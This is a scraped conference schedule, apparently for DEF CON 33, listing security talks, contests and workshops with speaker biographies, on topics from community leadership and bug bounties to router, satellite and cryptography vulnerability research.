The discussion will address key questions about running and transitioning technical communities: How do you manage village operations effectively? What have you learned about scaling community management? How do you handle criticism and feedback constructively? How do you identify and develop new leaders? When and how do you step back without losing community culture? The founders will also cover practical aspects like managing large-scale events and evolving with community needs.
The session wraps up with Q&A where you can explore specific challenges around building technical communities, leadership transitions, and maintaining founding vision while empowering new voices.
Whether you’re involved in community building, thinking about starting something new, or wondering about sustainable leadership models, this panel offers honest perspectives from founders navigating the transition from builders to advisors.
Speakers:Barrett Darnell,Mike Lisi,Omar Santos,Savannah Lazzara,Wes ThurnerMike Lisi is the founder of Maltek Solutions, a consulting and solutions company as well as a seasoned professional in the field of cybersecurity. Mike is known for his expertise in network, web application, and API penetration testing, his contributions toward Capture The Flag (CTF) events, and support for college cybersecurity competitions. As the founder of Maltek Solutions, Michael has carved a path of excellence, establishing a dynamic and innovative cybersecurity company. His leadership and technical expertise drive Maltek Solutions to deliver top-notch security solutions to customers and partners throughout the country.
SpeakerBio: Omar SantosOmar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
SpeakerBio: Savannah LazzaraSavannah Lazzara is a Security Engineer specializing in red teaming at a tech company. Savannah has multiple years of experience in security consulting working with many Fortune 500 corporations and has experience in carrying out security assessments, which include network assessments, social engineering exercises, physical facility penetration tests, and wireless assessments. Savannah also has experience in performing adversary simulation assessments, which include remote red team simulations, insider threat assessments, and onsite red team assessments. Savannahs area of expertise is focused on social engineering and physical security.
Savannah is a member of the Advisory Board for Red Team Village and co-authored ‘Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-Driven World’. She has spoken at several cybersecurity conferences, including Source Zero Con, BSides, and more. Savannah has also appeared on multiple podcasts, including The Hacker Factor and Hackerz and Haecksen.
SpeakerBio: Wes Thurner
- ics Calendar file
This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.
- ics Calendar file
Hack the Bots is a live-action hardware hacking competition where four teams face off using robotic platforms like the Tengu Marauder. The Tengu Marauder is an open source hacking bot platform that has presented at DEFCON32 and Blackhat USA. Each bot is operated by a two-person crew: one pilot to drive and engage in kinetic tactics, and one hacker to launch wireless, IoT, or hardware-based exploits. The mission? Reach the "King of the Hill" zone, capture the flag, and hold it against other attackers. Teams must bypass IoT-controlled barriers, dodge spinning and piston-powered obstacles, and survive attacks from rival robots. This session blends robotics, wireless warfare, and hands-on hacking in a physical capture-the-flag arena. No prior robotics experience is required, but a basic understanding of wireless or hardware attacks will give teams an edge. Bring your skills. Break their bots. Win the hill.
SpeakerBio: lexicon121
- ics Calendar file
There's an easter egg on our shirts! Have you been racking your brain trying to solve it? Whether you're on the right track, hitting a wall, or just have no clue where to begin, this is the talk for you! Come hang out and discover the secrets behind our shirt's design.
SpeakerBio: Corwin Stout, Simulation Software Engineer at Rivian Volkswagen Group TechnologiesCorwin is a simulation software engineer at Rivian Volkswagen Group Technologies with over a decade of experience in the electrified vehicle industry. Drawing on his deep background in controls and robotics, coupled with professional expertise in mapping & localization, vehicle controls, and autonomous driving, he designs and implements cutting-edge simulation software for both the automotive world and beyond. When he's not busy advancing the automotive world, Corwin loves tackling side projects that push him to learn something entirely new. That's exactly how he ventured into coding in the privacy and security space, and he's excited to share those first experiences with you today!
- ics Calendar file
Are you ready to transform your career and unlock new opportunities? Hacking Your Career is a self-paced, actionable course designed to equip you with the tools, strategies, and confidence to stand out in a competitive job market.
What You’ll Learn: - Build a personal brand that sets you apart from the competition. - Craft resumes and portfolios that hiring managers love. - Find hidden job opportunities and network effectively. - Master interviews and salary negotiations with ease.
SpeakerBio: Jason "jhaddix" Haddix, Field CISO at flare.ioJason has had a distinguished 20-year career in cybersecurity, previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin.
He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis.
Jason is a hacker, bug hunter, and is currently ranked 57th all-time on Bugcrowd's bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies.
Jason has also authored many talks for world-renowned conferences like DEF CON, Bsides, Black Hat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, ToorCon, and many more.
Jason Haddix AKA jhaddix is the CEO and “Hacker in Charge” at Arcanum Information Security. Arcanum is a world class assessment and training company.Jason has had a distinguished 20-year career in cybersecurity previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker, bug hunter and currently ranked 57st all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies. Jason has also authored many talks on offensive security methodology, including speaking at cons such as DEFCON, Besides, BlackHat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, Toorcon and many more.
- ics Calendar file
What is Hack3r Runw@y?
Hack3r Runw@y challenges creative minds in the hacker community to reimagine fashion through the lens of hacking. We're calling all glamorous geeks, crafty coders, and fashionably functional folks to dust off their soldering irons, grab their needles and threads, and unleash their inner designers. Whether you're a seasoned maker or a coding newbie, Hack3r Runw@y has a place for you. Hint: You don't have to know how to program to make cool wearables.
What to Expect:
Participants will submit their creations prior to the event and then walk the runway during our allotted time at DEF CON. Audience should be prepared to be amazed by a runway show unlike any other. Like really. Witness creations that push the boundaries of fashion and technology, showcasing the ingenuity and resourcefulness of the hacker community.
Expect to see:
Smart Wear that Wows: Garments integrated with LEDs, microcontrollers, sensors, and other tech wizardry, creating dazzling displays of functionality and style. Digital Design that Dazzles: Visually stunning pieces that use light, color, and texture to create captivating, passive designs.
Functional Fashion: Practical and stylish creations that solve real-world problems, from masks and shields to lockpick earrings and cufflink shims.
Extraordinary Style: Unique and expressive designs that push the boundaries of fashion, incorporating everything from 3D textures and optical illusions to cosplay and security-inspired patterns.
A Hacker Perspective on Fashion:
Hack3r Runw@y brings a unique hacker perspective to DEF CON by demonstrating the power of creativity and problem-solving in a non-traditional context. It showcases how hacking can be applied to art and self-expression, blurring the lines between technology, fashion, and culture. It's about more than just making cool gadgets; it's about pushing boundaries, challenging conventions, and exploring the intersection of technology and human experience.
What You'll Learn:
Hack3r Runw@y offers attendees a glimpse into the creative potential of the hacker community. You'll see firsthand how technical skills can be combined with artistic vision to create truly unique and innovative designs. You'll be inspired by the ingenuity and resourcefulness of the participants, and you might even pick up some ideas for your own projects. It's a chance to learn about new technologies, see them applied in unexpected ways, and connect with a community of like-minded individuals. Hack3r Runw@y teamed up with the DC Maker Community during DEF CON 32 to offer a workshop on sewing LEDs to clothing. Look out for something similar this year.
The Competition:
Participants will compete in four categories for a chance to win in each, plus the coveted People’s Choice trophy, where anyone can win, but there will be a twist! Our esteemed judges will select winners based on:
Join us at DEF CON 33 for Hack3r Runw@y and witness the future of fashion! Be prepared to be amazed, inspired, and maybe even a little bit hacked. This is an event you won't want to miss!
There are no prerequisites outside of you wearing something that you made or had a hand in making. You are welcome to model store bought outfits, but you will not qualify for a prize.
Proof that you created the item and signed up via the google form. Submissions due no later than 4pm EST on Saturday, August 10, 2024. Link to form found here: https://hack3rrunway.github.io/
- ics Calendar file
The financial implications of smart contract vulnerabilities are substantial. Smart contracts often handle large amounts of value, and successful exploitation can lead to significant financial losses for users and project developers. In this session I will share the latest smart contract /web3 security trends and vulnerabilities. The attendees will learn how to create tests for security issues in smart contracts written in Solidity, and how to "profit" from it.
SpeakerBio: DavideDavide Cioccia is the founder of DCODX, an ethical hacking, and security training firm focusing on DevSecOps and web3. Speaker and trainer at multiple international conferences like Black Hat, HITB, OWASP AppSec, DevSecCon and DEF CON, he is currently leading the DevSecCon Netherlands chapter in Amsterdam.
- ics Calendar file
Have you ever wondered what would happen if you took ostensibly smart people, put them up on a stage, maybe provided a beer or two and started asking really tough technical questions like what port Telnet runs on? Well wonder no more! Back to start its 31st year at Defcon, Hacker Jeopardy will have you laughing, groaning and wondering where all the brain cells have gone. Some come share an evening of chanting DFIU followed immediately by someone FIU. This is a mature show, 18+.
None
No
- ics Calendar file
Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Everyone is encourage to participate in a DEF CON tradition from all folks and skill levels.
- ics Calendar file
Enter the Hacker Troll House to take on a variety of entry-level Linux security challenges against the Trolls. The Hacker Troll House challenges are short, timed, and will require you to think on your feet to beat the Trolls at their own game. But be warned, Trolls don't play fair! Basic Linux command line and file system knowledge recommended (bash scripting a plus).
SpeakerBio: James RiceMr. James Rice has been cybersecurity faculty for the last decade in Upstate New York at Mohawk Valley Community College and more recently Rochester Institute of Technology. During this time, Mr. Rice has focused on developing numerous interactive gamified learning scenarios for the classroom and cyber competitions such as the NSA sponsored NCAE Cyber Games. Mr. Rice is currently pursuing his PhD at RIT in Computer Engineering and researching how to best leverage immersive reality technologies for data visualization and interaction, primarily in cyberspace.
- ics Calendar file
Rotating real production games to hack in a player vs player competition to create real hacks to win various games. Teams or individuals can win Gold Silver or Bronze or just have fun playing the games
- ics Calendar file
Information stealer malware is one of the most prolific and damaging threats in today’s cybercrime landscape, siphoning off everything from browser-stored credentials to session tokens. In 2024 alone, we witnessed more than 30 million stealer logs traded on underground markets. Yet buried within these logs is a goldmine: screenshots captured at the precise moment of infection. Think of it as a thief taking a selfie mid-heist, unexpected but convenient for us, right? Surprisingly, these crime scene snapshots have been largely overlooked until now. Leveraging them with Large Language Models (LLMs), we propose a new approach to identify infection vectors, extract indicators of compromise (IoCs) and track infostealer campaigns at scale. In our analysis, we will break down three distinct campaigns to illustrate their tactics to deliver malware and deceive victims.
With its live demonstration, this presentation shows how LLMs can be harnessed to extract IoCs at scale while addressing the challenges and costs of implementation. Attendees will walk away with a deeper understanding of the modern infostealer ecosystem and will want to apply LLM to any illicit artifacts to extract actionable intelligence.
Speakers:Olivier Bilodeau,Estelle RuellanOlivier Bilodeau, a principal researcher at Flare, brings 15+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. Passionate communicator, Olivier spoke at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontréHack, is NorthSec’s President, and runs its Hacker Jeopardy.
SpeakerBio: Estelle RuellanEstelle is a Threat Intelligence Researcher at Flare. With a background in Mathematics and Criminology, Estelle lost her way into cybercrime and is now playing with lines of code to help computers make sense of the cyber threat landscape. She presented at conferences like ShmooCon 2025, Hack.lu 2024, eCrime APWG 2024 in Boston and the 23rd Annual European Society of Criminology Conference (EUROCRIM 2023) in Florence.
- ics Calendar file
In his first-ever public appearance, elite hacker ZwinK joins Casey Ellis (CEO of BugCrowd) and Keith Busby (Acting CISO of the Centers for Medicare & Medicaid Services (CMS)) for a rare, unscripted look inside one of the largest, and most consequential bug bounties in the federal government. CMS touches the lives of 150M+ Americans and secures data that must not go offline — which made its decision to invite hackers inside both radical and risky.
This talk will cover how the program worked, what CMS learned, and how ZwinK uncovered critical vulnerabilities in public-facing federal systems. ZwinK will share his surprising favorite tactics, tools, and recon strategies — including how he hunts for high-value bugs in complex, regulated environments. Keith will explore how CMS weighed the risks of shining a light on its attack surface and how they battled the naysayers and managed federal red tape. Casey will discuss how BugCrowd is helping agencies shift from fear to resilience by operationalizing collaboration with hackers.
Expect real lessons, live banter, and a sharp edge — especially if your agency (or client) is still on the fence about bug bounties. No knowledge of healthcare is needed to enjoy this panel, just come curious!
Speakers:ZwinK,Casey Ellis,Keith Busby,Leah SiskindZwinK is a renowned ethical hacker and cybersecurity expert with decades of experience in identifying critical vulnerabilities in web mobile applications. Specializing in broken access control (BAC) bugs and often known as “the IDOR guy”, he has established a formidable reputation through meticulous manual penetration testing of digital services and platforms worldwide.
With an impressive track record, ZwinK has logged over 1,300 bugs on the Bugcrowd platform in only four years, showcasing his ability to uncover vulnerabilities. This expertise has earned him the #1 rank in the United States and 9th place globally on the Bugcrowd platform for high/critical impact bugs, a testament to his skill and dedication in the field of ethical hacking. He also holds the first place position on programs hosted by industry giants such as T-Mobile and State Farm.
His work has significantly bolstered the security posture of these organizations, protecting sensitive data and ensuring robust defenses against cyber threats. ZwinK continues to push the boundaries of ethical hacking, and has recently taken to working on federal government programs, such as CMS (“Centers for Medicare & Medicaid Services”). He also loves educating and inspiring the next generation of cybersecurity professionals.
SpeakerBio: Casey Ellis, Founder and Chairperson at BugcrowdCasey is a serial entrepreneur and executive, best known as the founder of Bugcrowd and co-founder of The disclose.io Project. He is a 25+ year veteran of information security who grew up inventing things and generally getting technology to do things it isn't supposed to do. Casey pioneered the crowdsourced security as-a-service model, launching the first bug bounty programs on the Bugcrowd platform in 2012, and co-founded the disclose.io vulnerability disclosure standardization project in 2014 prior to its launch in 2018. He’s an active member of a variety of policy and threat intelligence working groups and think tanks such as the Cyber Threat Intelligence League, w00w00, Hacking Policy Council, and the Election Security Research Forum. He has personally advised the US White House, DoD, Department of Justice, Department of Homeland Security/CISA, the Australian and UK intelligence communities, and various US House and Senate legislative cybersecurity initiatives, including preemptive cyberspace protection ahead of the 2020 Presidential Elections, the US National Cyber Strategy, and a variety of policies and EO’s relating to security research, anti-hacking law, and artificial intelligence. Casey, a native of Sydney, Australia, is based in the San Francisco Bay Area.
SpeakerBio: Keith Busby, CISO at Centers for Medicare and Medicaid ServicesKeith Busby is the Acting Chief Information Security Officer at the Centers for Medicare and Medicaid Services (CMS), where he leads enterprise cybersecurity, compliance, privacy, policy, and counterintelligence efforts. With over 20 years in IT and security; including leadership roles in cyber threat operations and compliance, he brings a mission-driven approach to modernizing and securing federal systems at scale. Keith’s roots in security run deep: from his time as a U.S. Army veteran to his work securing one of the nation’s largest school districts. He holds a B.S. in Computing and Security Technologies from Drexel University and a M.S. in Cybersecurity and Information Security from Capitol Technology University. Outside of work, Keith is a self-declared participation trophy-winning backyard BBQ pitmaster and a dedicated youth baseball coach. He thrives at the intersection of public service, technical leadership, and dad jokes.
SpeakerBio: Leah Siskind, Center on Cyber and Technology InnovationLeah Siskind is an AI artificial intelligence (AI) research fellow at the Center on Cyber and Technology Innovation at the Foundation for Defense of Democracies. At CCTI, her research focuses on the adversarial use of AI by state and non-state actors — including Iran, China, Russia, North Korea — targeting the United States and its allies. Previously Leah served as the deputy director of the AI Corps at the U.S. Department of Homeland Security. She previously spent four years with the U.S. Digital Service in the White House, where she led efforts to modernize government technology. Her private sector experience includes roles at data and analytics companies such as Palantir and Uptake. Earlier in her career, she worked in diplomacy as a representative of Israel’s Foreign Ministry, leading government affairs at the consulate in the Pacific Northwest.
- ics Calendar file
What happens to K-12 cybersecurity when federal leadership steps back? This session explores state-led cyber defense models for schools and how the hacker community can play a vital role in this ecosystem.
Our panel brings diverse perspectives on cyber policy and practice currently protecting America's schools:
This discussion will be accessible to policy-focused attendees while providing technical participants with concrete examples of state-level cyber defense efforts. Participants will leave with insights about how to:
Michael Klein is Senior Director for Preparedness and Response at the Institute for Security and Technology (IST), where he focuses on improving the resilience of “target rich, cyber poor” critical infrastructure sectors. He comes to the role with nearly 20 years of experience across K-12 education as a teacher, coach, consultant, and school district leader as well as federal cyber policy.
Most recently, as the US Department of Education’s (ED) Senior Advisor for Cybersecurity, Michael led ED’s K-12 cybersecurity work with the National Security Council, Office of the National Cyber Director, CISA, FBI, the Intelligence Community, as well as State, Local, Tribal, and Territorial (SLTT) partners, and the private sector. In his 2 years at ED, he had the honor of briefing senior leaders in the Situation Room during the largest K-12 cyber incident, organizing 3 White House events, including the “Back to School Safely” K-12 Cyber Summit hosted by the First Lady, leading the implementation of National Security Memorandum 22, and establishing a Government Coordinating Council (GCC) that engages key stakeholders around K-12 cybersecurity, ransomware, and critical infrastructure resilience.
SpeakerBio: Vanessa Wrenn, Chief Information Officer at North Carolina Department of Public InstructionDr. Vanessa Wrenn serves as the Chief Information Officer (CIO) for the North Carolina Department of Public Instruction (NCDPI), where she leads the strategic direction and oversight of cybersecurity, infrastructure, system modernization, and digital learning across the state’s public schools. With a strong focus on protecting sensitive student and education data, Vanessa champions statewide cybersecurity initiatives, ensuring that North Carolina’s K–12 systems are resilient, secure, and future-ready.
In her role, she coordinates with state agencies, school districts, and technology partners to deliver innovative solutions and critical cyber resources, building a safer digital learning environment for more than 1.5 million students and educators. Vanessa is a trusted voice in educational technology and a passionate advocate for cybersecurity awareness and readiness across all levels of public education, leading the advocacy for successful prohibition of payment of ransom laws in North Carolina for state and local government entities and a strong advocate for sustainable cybersecurity funding, including efforts to expand the use of the federal E-rate program to support K–12 cyber defense needs.
SpeakerBio: Johnathan Hampe, Chief Information Security Officer at South Dakota Bureau of Information and TelecommunicationsJohnathan is the Chief Information Security Officer (CISO) for the State of South Dakota. He is responsible for the state’s cybersecurity program, security strategy, security policy, and general security operations. Prior to this role, Johnathan was an Agency & Application Support Director for the state. In that role, he oversaw the software portfolios for five state agencies and advised their leadership on a number of different IT topics, including security and compliance. Johnathan first joined the state in late 2023 as the deputy CISO. Before that, he spent over 12 years in IT leadership roles with the federal government.
SpeakerBio: Silas Cutler, Principal Security Researcher at CensysSilas Cutler is a Principal Security Researcher at Censys, where he brings over a decade of specialized experience in tracking organized cyber threat groups and developing advanced pursuit methodologies. Throughout his distinguished career, Silas has held leadership positions at premier cybersecurity organizations, including roles as Resident Hacker for Stairwell, Reverse Engineering Lead for Google Chronicle, and Senior Security Researcher on CrowdStrike's Intelligence team.
Since 2021, he has played an instrumental role in advancing the Ransomware Task Force's initiatives and as an adjunct supporting the Institute of Technology, fostering critical collaboration between public and private sectors in combating ransomware threats.
Silas is also the founder and lead developer of MalShare, a pioneering public malware repository that has supported the global security research community since 2013.
- ics Calendar file
Modern SOCs are flooded with alerts yet blind to what matters. This talk shows how to auto-discover attack flows and root causes by hacking context across telemetry, logs, and threat signals. Using open-source tools and correlation logic, we’ll walk through real-world detection pipelines that stitch together events across cloud, endpoint, and network environments. You'll learn lightweight, vendor-agnostic approaches to enrich data, group alerts by incident, and make sense of security chaos — fast.
SpeakerBio: Ezz TahounEzz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
- ics Calendar file
Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.
During the course you will:
Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.
This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.
No prior knowledge required!
Learning Objectives
- ics Calendar file
Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.
During the course you will:
Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.
This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.
No prior knowledge required!
Learning Objectives
- ics Calendar file
Cryptocurrency exchanges have the reputation of keeping 'not your keys so not your coins', but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.
Speakers:Sky Gul,Andrea
- ics Calendar file
This research examines security oversights in a range of modern 4G/5G routers used in small businesses, industrial IoT, and everyday mobile deployments. Several of these routers contain vulnerabilities reminiscent of older security flaws, such as weak default credentials, inadequate authentication checks, and command injection pathways. By reverse-engineering firmware and testing for insecure endpoints, it was possible to demonstrate remote code execution, arbitrary SMS sending, and other serious exploits affecting Tuoshi and KuWFi devices.
Through practical examples, including Burp Suite requests and Ghidra disassembly, the talk highlights how these weaknesses can grant attackers root access, allow fraudulent activity, or compromise entire networks. In each case, mitigation strategies and best practices—like robust authentication, regular firmware updates, and network segmentation—are emphasized. Ultimately, this presentation underscores the importance of continuous security scrutiny, even for modern hardware, and encourages the community to stay vigilant and collaborate in uncovering and addressing such pervasive vulnerabilities.
References:
Edward Warren is an Information Security Analyst and Independent Security Researcher specializing in IoT and mobile application security. Over the past few years he has discovered critical (CVSS) 0-day vulnerabilities. Edward also earned a Hall of Fame acknowledgement from the Google Play Security Reward Program (GPSRP) and attribution in numerous CVE publications. He has presented his work at conferences such as BSides and ShmooCon. When not tracking down digital bugs, Edward can be found hiking rugged trails or exploring the seas through his newfound fascination for scuba diving.
- ics Calendar file
- ics Calendar file
Las tecnologías satelitales son el backbone silencioso de nuestra infraestructura digital moderna: desde comunicaciones y navegación, hasta monitoreo climático y operaciones militares. Sin embargo, estos sistemas operan bajo arquitecturas altamente específicas, frecuentemente con tecnologías legacy, protocolos propietarios, y requisitos físicos y orbitales que los hacen difíciles de probar y asegurar. Esta combinación crea un terreno fértil para actores avanzados y amenazas persistentes que pueden explotar la seguridad insuficiente del sector espacial.x000D x000D Esta charla explora técnicas ofensivas enfocadas en vulnerabilidades reales y escenarios tácticos simulados en sistemas satelitales. El contenido está respaldado por investigaciones realizadas en entornos virtuales que emulan estaciones terrestres, elnlaces de comunicación satelital, y enlaces de control y telemetría. Profundizaremos en:x000D x000D - Introducción técnica detallada a la tecnología, protocolos, infraestructura y comunicaciones satelitales_x000D_ - Técnicas para explotacion y atque a los enlaces de comunicación de satélites con estaciones terrestres_x000D_ - Emulación de estaciones terrestres, emuladores de satélites y ataques en ambientes controlados.x000D - Pruebas de penetración simuladas contra satélites virtuales por ejemplo, sniffing, replay, spoofing, y takeover, entre otros.x000D - Modelado de amenazas y TTPs inspirados en grupos APT que han apuntado a infraestructuras aeroespaciales.x000D x000D Lo que aprenderá la audiencia_x000D_ x000D - Cómo iniciar en el área y como construir un entorno de pruebas realista para realizar pentesting ofensivo en sistemas satelitales.x000D - Vectores de ataque RF, spoofing y explotación de protocolos espaciales.x000D - Cómo modelar amenazas ofensivas en el contexto aeroespacial_x000D_ - Limitaciones actuales de la ciberseguridad en el dominio espacial y oportunidades de investigación ofensiva.x000D
SpeakerBio: Romel Marin, X-Force Red, PentesterRomel Marín es un pentester senior en el equipo de ciberseguridad ofensiva IBM X-Force Red, con una carrera de 10 años. Destaca por su especialización en pruebas de penetración en diferentes tipos de infraestructuras de redes internas y externas, aplicaciones, redes OT, Cloud, dispositivos iot, tecnología aeroespacial, entre otros. Su enfoque reciente ha sido la investigación en ciberseguridad ofensiva y defensiva en tecnologías aeroespaciales e inteligencia artificial. x000D Posee certificaciones destacadas como OSCE, OSCP, OSEP, OSWA, CRTO, CRTP, DSOC, entre otras. Además, es coautor de un libro centrado en ciberseguridad ofensiva con Parrot Security y miembro fundador del grupo Defcon de Costa Rica (DC11506), habiendo sido ponente en múltiples conferencias internacionales.
- ics Calendar file
Drawing from personal experience as a press photographer, this talk highlights the underexplored attack surface created by media access at high profile events like concerts, sporting events and political rallies. We explore how the press badge can become a powerful tool in the hands of a red teamer. By taking into account elements of OSINT, social engineering, and physical and network security, we focus on how lessons learned as a press photographer can directly be applied by red teamers (or threat actors!) to gain a foothold. Once that is achieved, individuals can embed themselves directly within high-visibility individuals and high-value, sensitive devices associated with professional sports teams, musicians and bands, and political leaders and lawmakers. The talk also discusses the importance of looking at the ‘bigger picture’, and being aware of threats where people may not consider them to come from. Inspired by the spirit of Johnny Long’s No Tech Hacking, this talk examines how low-tech, high-ingenuity approaches continue to be in a hacker's arsenal. It makes the case that media impersonation is a serious but overlooked threat vector, and one that allows attackers to bypass traditional perimeters.
Speakers:Mansoor Ahmad,Brad AmmermanMansoor Ahmad is an offensive security practitioner who has always had a curiosity about how things worked. He studied information technology and worked as a news photographer in college. A quiet kid growing up in a foreign country, he would always accompany his father on errands and observe people's reactions to different things and the psychology behind it. This started an itch which he has been scratching since then, that has led to a career in information security. When he's not working, eating or sleeping, Mansoor likes to practice photography and taking naps.
SpeakerBio: Brad AmmermanBrad Ammerman, a leading figure in security testing, currently serves as the Senior Director at Prescient Security. His background includes influential roles at companies like Foresite, Optiv Security, Lockheed Martin, DIA, DoD, and Supreme Court of Nevada, where he developed his expertise in offensive security and team management. A skilled hacker himself, Brad is also a recognized speaker, educator, mentor, and disabled veteran, dedicated to teaching and protecting others. He takes great pride in his roles as a devoted husband and father.
- ics Calendar file
In today’s bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.
Attendees will learn how assoc empowers them to define their own asset discovery logic, conduct complex association walks through the graph, and surface infrastructure that traditional scanners and passive methods overlook. Whether you're pivoting off a supplier’s ASN, correlating certificate reuse across sub-brands, or mapping out a shadow IT network tied to a legal entity, assoc offers an unmatched level of flexibility and precision. Live demos will show how to craft custom triples, execute walks, and extract actionable intelligence—all with an eye toward real-world bug bounty impact. If you're ready to out-hack the competition, this is a talk you won’t want to miss.
SpeakerBio: Jeff "caffix" Foley, Founder & Project Leader, OWASP AMASS at OWASPJeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.
- ics Calendar file
We're going to explore how OBD-II emissions testing works and how you might go about convincing the scanner that everything is fine.
References:
SpeakerBio: ArchwispLong-time tech nerd, car enthusiast, and hardware hacker
- ics Calendar file
Rebooted this year, enjoy a traditional fox hunt tracking down the hidden transmitters.
Up for more of a challenge? Attempt to solve the hidden puzzle within the fox hunt to win the ultimate prize!
--
The last surviving fragments of Project ACCESS, a defunct open comms initiative, have resurfaced. The faceless OmniCorp thought they had erased it from the spectrum, but rogue operatives are pushing back. Disguised among the DEF CON crowd, Foxes are carrying the pieces needed to reboot the system.
They’re broadcasting open signals across the con space. Your job? Track them down, follow the trail, and recover the payloads. Some Foxes are stationary. Others are on the move. All of them have something you need—but they won’t just hand it over. You’ll have to answer DEF CON trivia, solve puzzles, or earn their trust in creative ways.
This isn’t a gear-only hunt. Whether you’re rocking SDRs, handheld radios, or just tuned into the right frequency, you’ve got a shot. It’s part signal chase, part real-world goose chase, and 100% hacker weirdness.
Expect: - Live human Foxes broadcasting short-range signals - Some Foxes roaming the con floor hunt them down, respectfully - DEF CON history questions, crypto puzzles, and maybe a social engineering twist or two - Physical items or clues exchanged when you succeed - No encryption. No gatekeeping. Just old school radio and clever chaos.
Think you can track the signal, crack the code, and restore the last breath of open access?
Then grab your gear, tune in, and start hunting.
RF Fox Hunt(s): To participate in the RF fox hunt(s), you will need a radio or scanner that can receive signals in the 2m and/or 70cm Amateur Radio Bands (144.000 MHz - 148.000 MHz, 420.000 MHz - 450.000 MHz).
